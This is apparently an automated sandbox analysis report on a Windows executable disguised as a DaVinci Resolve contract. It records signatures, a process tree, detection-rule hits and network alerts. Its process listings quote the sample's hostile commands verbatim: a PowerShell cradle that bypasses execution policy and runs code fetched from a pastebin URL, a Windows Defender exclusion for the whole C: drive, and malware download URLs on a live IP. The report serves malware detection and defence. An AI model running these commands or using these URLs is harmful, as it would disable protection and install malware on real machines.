
Windows Analysis Report
Editing.exe

Overview

General Information

Sample name: Editing.exe (renamed because original name is a hash value)
Original sample name: [DaVinci Resolve] 2025 Contract Innovation, Creativity, Collaboration for the Future of Video Editing.exe
Analysis ID: 1617330
MD5: 1c452228e454c9478dd76e6c77e635ff
SHA1: 04d14a300f25a784affeeb7e0f5f897abcb3585e
SHA256: 13460f0abf2ca0f422034226fba37f877ee68c724f367f953e89519f32822ae7
Tags: exe, WHKzW2nr, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Editing.exe (PID: 6244 cmdline: "C:\Users\user\Desktop\ Editing.exe" MD5: 1C452228E454C9478DD76E6C77E635FF)
    • powershell.exe (PID: 4560 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5908 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 2052 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 2168 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD5A5.tmp" "c:\Users\user\AppData\Local\Temp\fri53hgi\CSCED018B8952BA4EF4818E245D55BA92D6.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 1088 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 5908, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4560, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 5908, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", ProcessId: 2052, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 5908, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4560, ProcessName: powershell.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 5908, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5908, TargetFilename: C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4560, ProcessName: powershell.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", ProcessId: 2052, ProcessName: csc.exe
Suricata IDS alerts (network traffic)

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-02-17T18:58:32.456652+0100  2803305  3         Unknown Traffic          192.168.2.6  49778        172.67.74.152    80                TCP
2025-02-17T18:58:32.941027+0100  2803305  3         Unknown Traffic          192.168.2.6  51663        208.95.112.1     80                TCP
2025-02-17T18:58:33.979451+0100  2803305  3         Unknown Traffic          192.168.2.6  51668        149.154.167.220  443               TCP
2025-02-17T18:58:56.358630+0100  2803305  3         Unknown Traffic          192.168.2.6  51682        89.23.97.214     80                TCP
2025-02-17T18:58:56.378249+0100  2803305  3         Unknown Traffic          192.168.2.6  51681        89.23.97.214     80                TCP
2025-02-17T18:59:17.865537+0100  2803305  3         Unknown Traffic          192.168.2.6  51810        89.23.97.214     80                TCP
2025-02-17T18:59:17.869320+0100  2803305  3         Unknown Traffic          192.168.2.6  51811        89.23.97.214     80                TCP
2025-02-17T18:59:39.250300+0100  2803305  3         Unknown Traffic          192.168.2.6  51876        89.23.97.214     80                TCP
2025-02-17T18:59:39.250336+0100  2803305  3         Unknown Traffic          192.168.2.6  51875        89.23.97.214     80                TCP
2025-02-17T19:00:00.703812+0100  2803305  3         Unknown Traffic          192.168.2.6  51879        89.23.97.214     80                TCP
2025-02-17T19:00:00.735060+0100  2803305  3         Unknown Traffic          192.168.2.6  51880        89.23.97.214     80                TCP

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-02-17T18:58:33.979451+0100  1810007  1         Potentially Bad Traffic  192.168.2.6  51668        149.154.167.220  443               TCP
2025-02-17T19:00:01.414848+0100  1810007  1         Potentially Bad Traffic  192.168.2.6  51881        149.154.167.220  443               TCP
2025-02-17T19:00:01.415857+0100  1810007  1         Potentially Bad Traffic  192.168.2.6  51882        149.154.167.220  443               TCP

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-02-17T18:58:17.861532+0100  1810000  2         Potentially Bad Traffic  192.168.2.6  49706        104.20.3.235     443               TCP


AV Detection

Source: http://89.23.97.214/TeamBuild/win64_svchost.exe | Avira URL Cloud: Label: malware
Source: http://89.23.97.214/TeamBuild/win32_svchost.exe | Avira URL Cloud: Label: malware
Source: Editing.exe | ReversingLabs: Detection: 51%
Source: Editing.exe | Virustotal: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51668 version: TLS 1.2
Source: Editing.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Editing.exe, 00000000.00000002.3216088459.00000284D09B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216068311.00000284D09A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256I source: Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214871433.00000284CFF50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: Editing.exe, 00000000.00000002.3214572685.00000284CFE30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214620254.00000284CFE71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: Editing.exe, 00000000.00000002.3214300596.00000284CFC41000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214325112.00000284CFC60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: Editing.exe, 00000000.00000002.3215619881.00000284D0541000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215366959.00000284D0240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Editing.exe, 00000000.00000002.3212455724.00000284CCAC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212473659.00000284CCAD0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: Editing.exe, 00000000.00000002.3212455724.00000284CCAC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212473659.00000284CCAD0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Editing.exe, 00000000.00000002.3212183576.00000284CC9D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212225709.00000284CCA01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3212165209.00000284CC9C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212254148.00000284CCA30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Editing.exe, 00000000.00000002.3214257265.00000284CFC20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214057906.00000284CFB01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Editing.exe, 00000000.00000002.3215940910.00000284D08D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211154010.0000024437CD1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Editing.exe, 00000000.00000002.3214347772.00000284CFC80000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214801607.00000284CFF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.pdbhP source: powershell.exe, 00000004.00000002.2191077266.0000020A63B94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212597286.00000284CCB11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214552955.00000284CFE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Editing.exe, Editing.exe, 00000000.00000002.3236670998.00007FF647018000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Editing.exe, 00000000.00000002.3214300596.00000284CFC41000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214325112.00000284CFC60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Editing.exe, 00000000.00000002.3215940910.00000284D08D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211154010.0000024437CD1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Editing.exe, 00000000.00000002.3214735866.00000284CFED0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214672966.00000284CFEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Editing.exe, 00000000.00000002.3212183576.00000284CC9D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212225709.00000284CCA01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214552955.00000284CFE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Editing.exe, 00000000.00000002.3213935450.00000284CFAE0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3213770399.00000284CF971000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: Editing.exe, 00000000.00000002.3216145339.00000284D09D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212913296.00000284CCFC8000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216549510.00000284D0E41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Editing.exe, 00000000.00000002.3214493572.00000284CFE00000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3210892163.00000244364D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Editing.exe, 00000000.00000002.3215920817.00000284D08B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3215900196.00000284D08A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Editing.exe, 00000000.00000002.3214715169.00000284CFEC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214755813.00000284CFEE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214801607.00000284CFF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: Editing.exe, 00000000.00000002.3214912074.00000284CFF61000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215091691.00000284D0130000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Editing.exe, 00000000.00000002.3214257265.00000284CFC20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214057906.00000284CFB01000.00000020.00001000.00020000.00000000.sdmp
